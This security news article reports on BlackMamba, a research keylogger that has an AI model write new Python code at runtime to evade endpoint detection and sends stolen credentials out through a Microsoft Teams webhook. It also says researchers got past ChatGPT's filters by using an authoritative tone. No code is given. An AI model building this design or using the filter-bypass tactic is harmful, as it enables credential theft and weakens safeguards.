Headline
ChatGPT-powered polymorphic Blackmamba malware evades detection
By Deeba Ahmed The ChatGPT-powered Blackmamba malware works as a keylogger, with the ability to send stolen credentials through Microsoft Teams. This is a post from HackRead.com Read the original post: ChatGPT-powered polymorphic Blackmamba malware evades detection
****The malware can target Windows, macOS and Linux devices.****
HYAS Institute researcher and cybersecurity expert, Jeff Sims, has developed a new type of ChatGPT-powered malware named Blackmamba, which can bypass Endpoint Detection and Response (EDR) filters.
This should not come as a surprise, as in January of this year, cybersecurity researchers at CyberArk also reported on how ChatGPT could be used to develop polymorphic malware. During their investigation, the researchers were able to create the polymorphic malware by bypassing the content filters in ChatGPT, using an authoritative tone.
As per the HYAS Institute’s report (PDF), the malware can gather sensitive data such as usernames, debit/credit card numbers, passwords, and other confidential data entered by a user into their device.
The ChatGPT-powered Blackmamba keylogger in action (Screenshot credit: Jeff Sims)
Once it captures the data, Blackmamba employs MS Teams webhook to transfer it to the attacker’s Teams channel, where it is “analyzed, sold on the dark web, or used for other nefarious purposes,” according to the report.
Jeff used MS Teams because it enabled him to gain access to an organization’s internal sources. Since it is connected to many other vital tools like Slack, identifying valuable targets may be more manageable.
Jeff created a polymorphic keylogger, powered by the AI-based ChatGPT, that can modify the malware randomly by examining the user’s input, leveraging the chatbot’s language capabilities.
The researcher was able to produce the keylogger in Python 3 and create a unique Python script by running the python exec() function every time the chatbot was summoned. This means that whenever ChatGPT/text-DaVinci-003 is invoked, it writes a unique Python script for the keylogger.
This made the malware polymorphic and undetectable by EDRs. Attackers can use ChatGPT to modify the code to make it more elusive. They can even develop programs that malware/ransomware developers can use to launch attacks.
Researcher’s discussion with ChatGPT
Jeff made the malware shareable and portable by employing auto-py-to-exe, a free, open-source utility. This can convert Python code into .exe files that can operate on various devices, such as macOS, Windows, and Linux systems. Additionally, the malware can be shared within the targeted environment through social engineering or email.
It is clear that as ChatGPT’s machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.
What is Polymorphic malware?
Polymorphic malware is a type of malicious software that changes its code and appearance every time it replicates or infects a new system. This makes it difficult to detect and analyze by traditional signature-based antivirus software because the malware appears different each time it infects a system, even though it performs the same malicious functions.
Polymorphic malware typically achieves its goal by using various obfuscation techniques such as encryption, code modification, and different compression methods. The malware can also mutate in real time by generating new code and unique signatures to evade detection by security software.
The use of polymorphic malware has become more common in recent years as cybercriminals seek new and innovative ways to bypass traditional security measures. The ability to morph and change its code makes it difficult for security researchers to develop effective security measures to prevent attacks, making it a significant threat to organizations and individuals alike.
- ARMO integrates ChatGPT to secure Kubernetes
- Scammers Pose as ChatGPT in New Phishing Scam
- Russian Hackers Eager to Bypass ChatGPT Restrictions